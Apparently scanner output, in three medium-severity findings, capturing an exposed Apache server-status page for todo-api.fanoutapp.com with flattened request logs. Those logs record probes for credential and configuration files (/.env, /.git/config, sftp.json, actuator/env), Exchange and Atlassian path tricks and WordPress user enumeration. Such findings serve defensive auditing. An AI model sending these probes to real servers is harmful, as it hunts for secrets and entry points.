0.372388188920.00.041.04 167.82.173.79http/1.1api.livecounter.org:8000GET /info.php HTTP/1.1 0-2925717050/7/452_ 0.391894577090.00.011.48 103.245.224.41http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2925717050/16/454_ 0.371889267790.00.031.40 140.248.83.86http/1.1api.livecounter.org:8000GET /.env HTTP/1.1 0-2925717050/14/488_ 0.396851579050.00.031.38 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2925717050/13/432_ 0.391305564280.00.020.88 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2925717050/10/465_ 0.35680676960.00.021.19 157.52.96.147http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-2925717050/14/468_ 0.4099665160.00.021.36 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2925717050/10/465_ 0.3794069750.00.011.07 167.82.173.20http/1.1api.livecounter.org:8000GET /server-status HTTP/1.1 0-2925717050/15/458_ 0.4022771790.00.031.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2925717050/15/475_ 0.4079677240.00.031.28 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2925717050/12/443_ 0.401369700.00.031.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2925717050/15/468_ 0.401372390.00.031.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2925717050/10/451_ 0.3374067580.00.020.94 127.0.0.1http/1.1hnstream.com:8000HEAD /old HTTP/1.1 0-2925717050/13/472_ 0.401478100.00.021.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2925717050/7/449_ 0.341300579080.00.011.23 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2925717050/16/468_ 0.4114878810.00.031.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-2925717050/15/453_ 0.411385770.00.021.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2925717050/11/462_ 0.4101262940.00.021.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2925717050/12/467_ 0.410362970.00.051.35 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2925717050/10/459_ 0.410363570.00.021.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2925717050/11/454_ 0.410371540.00.021.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2925717050/12/469_ 0.410364230.00.031.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2925717050/15/444_ 0.410766220.00.031.20 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-2925717050/16/485_ 0.410459710.00.031.21 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-29257170510/8/459W 0.390073040.00.021.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-25-0/0/244. 0.00311952242210.00.000.82 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/237. 0.003119523346190.00.000.68 167.82.173.44http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/236. 0.00311952033150.00.000.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-25-0/0/238. 0.003119522230670.00.000.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-25-0/0/256. 0.00311952648420.00.000.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-25-0/0/251. 0.003119521738770.00.000.84 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/259. 0.00311952143320.00.001.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/235. 0.00311952634720.00.000.68 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/236. 0.00311952636150.00.000.65 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/236. 0.00311952642540.00.000.90 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/242. 0.00311952648490.00.000.92 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/232. 0.00311952138480.00.000.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00311952528040.00.000.61 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/230. 0.00311952827550.00.000.79 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/259. 0.00311952639650.00.000.87 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/229. 0.00311952138810.00.000.65 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/249. 0.00311952136440.00.000.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/247. 0.00311952645950.00.000.97 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/248. 0.003119521737990.00.000.84 140.248.75.174http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/228. 0.003119521936650.00.000.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00311952635120.00.000.76 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/241. 0.003119521234010.00.000.85 157.52.117.82http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-25-0/0/234. 0.003119521628370.00.000.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/234. 0.00311952332870.00.000.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-25-0/0/249. 0.00311952732690.00.000.72 140.248.84.70http/1.1api.livecounter.org:8000GET
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf07c84780
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 06-Feb-2025 14:30:04 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 26 days 15 hours 51 minutes 6 seconds Server load: 0.28 0.18 0.18 Total accesses: 25410 - Total Traffic: 71.7 MB - Total Duration: 395597 CPU Usage: u38.95 s65.83 cu527.78 cs199.25 - .0361% CPU load .011 requests/sec - 32 B/second - 2956 B/request - 15.5686 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02393523no0yes124000 22393524no0yes025000 Sum200 149000 ____________________W____.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2723935230/16/427_ 0.400782070.00.110.96 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 0-2723935230/11/425_ 0.400575010.00.021.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2723935230/16/417_ 0.400860600.00.101.26 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-2723935230/11/456_ 0.400377120.00.031.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2723935230/16/400_ 0.410761170.00.040.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-2723935230/15/439_ 0.410369130.00.031.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2723935230/15/430_ 0.420763010.00.041.29 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 0-2723935230/13/439_ 0.420463440.00.031.03 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-2723935230/14/422_ 0.420469380.00.041.47 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-2723935230/13/445_ 0.400275150.00.101.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2723935230/14/404_ 0.420367470.00.031.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2723935230/13/435_ 0.420370690.00.031.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2723935230/15/418_ 0.420765870.00.030.88 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 0-2723935230/15/442_ 0.420476700.00.031.21 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-2723935230/13/424_ 0.420376830.00.031.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2723935230/16/434_ 0.420671430.00.031.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-2723935230/14/420_ 0.4003078680.00.031.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2723935230/11/423_ 0.420356440.00.101.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2723935230/12/438_ 0.420361050.00.031.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2723935230/16/426_ 0.420761910.00.031.00 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-27239352310/11/423W 0.400070410.00.031.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2723935230/13/436_ 0.401761970.00.031.03 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 0-2723935230/12/409_ 0.401463500.00.031.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2723935230/12/449_ 0.401457690.00.031.15 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2723935230/13/429_ 0.401466330.00.031.37 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-25-0/0/244. 0.00138580242210.00.000.82 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/237. 0.001385803346190.00.000.68 167.82.173.44http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/236. 0.00138580033150.00.000.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-25-0/0/238. 0.001385802230670.00.000.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-25-0/0/256. 0.00138580648420.00.000.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-25-0/0/251. 0.001385801738770.00.000.84 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/259. 0.00138580143320.00.001.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/235. 0.00138580634720.00.000.68 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/236. 0.00138580636150.00.000.65 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/236. 0.00138580642540.00.000.90 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/242. 0.00138580648490.00.000.92 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/232. 0.00138580138480.00.000.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00138580528040.00.000.61 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/230. 0.00138580827550.00.000.79 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/259. 0.00138580639650.00.000.87 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/229. 0.00138580138810.00.000.65 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/249. 0.00138580136440.00.000.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/247. 0.00138580645950.00.000.97 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/248. 0.001385801737990.00.000.84 140.248.75.174http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/228. 0.001385801936650.00.000.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00138580635120.00.000.76 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/241. 0.001385801234010.00.000.85 157.52.117.82http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-25-0/0/234. 0.001385801628370.00.000.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/234. 0.00138580332870.00.000.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-25-0/0/249. 0.00138580732690.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf3e9f7e30
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Tuesday, 04-Feb-2025 17:39:23 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 26 Parent Server MPM Generation: 25 Server uptime: 24 days 19 hours 26 seconds Server load: 0.17 0.17 0.17 Total accesses: 23939 - Total Traffic: 67.6 MB - Total Duration: 372294 CPU Usage: u35.95 s61.91 cu485.89 cs183.72 - .0358% CPU load .0112 requests/sec - 33 B/second - 2960 B/request - 15.5518 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02215582no0yes124000 12215581no0yes025000 Sum200 149000 ________________________W_________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2522155820/14/388_ 0.491373760.00.030.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2522155820/13/397_ 0.471828771350.00.041.29 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2522155820/18/385_ 0.461590557640.00.051.12 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2522155820/19/425_ 0.4613411472070.00.181.17 152.32.252.171http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2522155820/10/362_ 0.471346157800.00.020.72 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2522155820/11/404_ 0.48392663630.00.021.04 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/8/393_ 0.4710501753910.00.031.21 127.0.0.1http/1.1api.hnstream.com:8000GET /api/session/properties HTTP/1.1 0-2522155820/16/403_ 0.461045658830.00.030.95 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2522155820/16/385_ 0.46387664800.00.031.29 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/16/417_ 0.491461380.00.031.08 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2522155820/12/369_ 0.49237155740.00.021.02 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2522155820/12/404_ 0.49124369030.00.101.21 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /sitemaps.xml HTTP/1.1 0-2522155820/13/382_ 0.500361130.00.020.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2522155820/11/406_ 0.4913574410.00.031.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2522155820/12/395_ 0.490372110.00.031.10 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2522155820/16/400_ 0.472324666660.00.121.17 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-2522155820/15/387_ 0.462193673970.00.030.95 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/14/391_ 0.490450630.00.031.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2522155820/12/400_ 0.461823655050.00.031.17 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/17/391_ 0.491558210.00.030.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2522155820/14/396_ 0.490468160.00.030.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2522155820/13/403_ 0.471595755400.00.030.95 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2522155820/17/378_ 0.47119661120.00.071.06 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2522155820/15/418_ 0.500553900.00.031.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-25221558210/13/397W 0.470061800.00.031.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2522155810/9/240_ 0.3228171742030.00.020.78 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/13/233_ 0.392820545640.00.050.67 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-2522155810/9/233_ 0.3928222233060.00.110.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-2522155810/13/233_ 0.372822530110.00.060.79 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-2522155810/13/252_ 0.342822048170.00.030.78 127.0.0.1http/1.1hnstream.com:8000GET /wp-login.php HTTP/1.1 1-2522155810/14/247_ 0.35988138430.00.030.83 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2522155810/10/257_ 0.40993843250.00.031.12 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/14/231_ 0.352815734500.00.030.67 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/9/234_ 0.402799536000.00.020.65 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/15/232_ 0.352794042220.00.030.89 127.0.0.1http/1.1hnstream.com:8000GET /sftp-config.json HTTP/1.1 1-2522155810/12/240_ 0.402259848360.00.030.91 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/11/228_ 0.2822541338300.00.030.73 127.0.0.1http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 1-2522155810/13/246_ 0.33124727920.00.030.61 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2522155810/10/228_ 0.35377227460.00.020.79 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2522155810/11/256_ 0.40382539520.00.100.87 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/12/226_ 0.359271038790.00.030.64 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2522155810/7/247_ 0.4204836360.00.090.76 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-2522155810/14/244_ 0.411383045830.00.030.96 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 1-2522155810/10/246_ 0.40932137730.00.030.83 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2522155810/8/225_ 0.35133636340.00.010.56 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/12/244_ 0.342830634860.00.030.76 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2522155810/16/238_ 0.4201433800.00.120.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2522155810/5/232_ 0.420828190.00.080.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-2522155810/8/231_ 0.362822332690.00.020.59 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-2522155810/8/246_ 0.3155336
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfd02938e6
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 02-Feb-2025 21:27:36 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 22 hours 48 minutes 38 seconds Server load: 0.18 0.16 0.16 Total accesses: 22517 - Total Traffic: 63.3 MB - Total Duration: 347606 CPU Usage: u33.24 s57.49 cu444.64 cs168.77 - .0355% CPU load .0114 requests/sec - 33 B/second - 2948 B/request - 15.4375 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02033768no1yes025000 12033767no0yes124000 Sum201 149000 _______________________________W__________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2320337680/13/357_ 0.394065566330.00.020.73 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/10/361_ 0.384060567200.00.021.21 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2320337680/10/353_ 0.374447153790.00.021.04 140.248.67.97http/1.1api.hnstream.com:8000GET /comments/stream// HTTP/1.1 0-2320337680/12/386_ 0.393068662840.00.020.95 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/8/334_ 0.40664654320.00.020.66 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/14/377_ 0.383063459260.00.030.98 23.235.35.22http/1.1api.hnstream.com:8000GET /_profiler/phpinfo HTTP/1.1 0-2320337680/10/365_ 0.392206749120.00.021.07 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/12/372_ 0.352201649940.00.020.88 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/10/348_ 0.391867559720.00.021.22 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/12/380_ 0.351862656280.00.021.01 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2320337680/11/341_ 0.401599651040.00.020.96 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/15/376_ 0.351594660260.00.031.08 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2320337680/7/346_ 0.401136055820.00.010.72 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-2320337680/16/379_ 0.381131164060.00.031.06 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/9/367_ 0.4010262861160.00.021.04 127.0.0.1http/1.1api.hnstream.com:8000GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-2320337680/13/363_ 0.38659359870.00.031.00 127.0.0.1http/1.1api.hnstream.com:8000GET /geoip/ HTTP/1.1 0-2320337680/8/350_ 0.374520168440.00.010.86 103.245.224.33http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-2320337680/15/359_ 0.381021344020.00.091.04 127.0.0.1http/1.1api.hnstream.com:8000GET /upl.php HTTP/1.1 0-2320337680/11/369_ 0.40548251580.00.021.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/12/361_ 0.40548454410.00.020.76 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-2320337680/9/365_ 0.39543357760.00.020.87 127.0.0.1http/1.1api.hnstream.com:8000GET /systembc/password.php HTTP/1.1 0-2320337680/14/374_ 0.4030550850.00.020.89 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/8/343_ 0.3725657570.00.020.95 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2320337680/13/384_ 0.394452550650.00.020.99 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/14/364_ 0.401158320.00.021.24 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2320337670/17/217_ 0.651340190.00.100.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2320337670/18/207_ 0.651444240.00.090.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-2320337670/27/212_ 0.651731930.00.120.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-2320337670/20/207_ 0.651328850.00.120.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2320337670/25/227_ 0.650740650.00.050.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-2320337670/19/220_ 0.650335010.00.110.77 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-23203376710/25/231W 0.630039560.00.191.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2320337670/19/203_ 0.634431910.00.050.61 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2320337670/27/212_ 0.634529880.00.130.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2320337670/20/204_ 0.633739090.00.050.83 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /about HTTP/1.1 1-2320337670/26/216_ 0.633440930.00.060.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2320337670/19/203_ 0.633334820.00.040.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2320337670/21/216_ 0.633423490.00.040.54 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2320337670/17/203_ 0.633423450.00.040.74 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2320337670/28/231_ 0.643235670.00.120.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2320337670/20/199_ 0.643334640.00.050.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2320337670/22/229_ 0.642731430.00.040.65 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-2320337670/23/216_ 0.642735980.00.050.90 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-2320337670/22/221_ 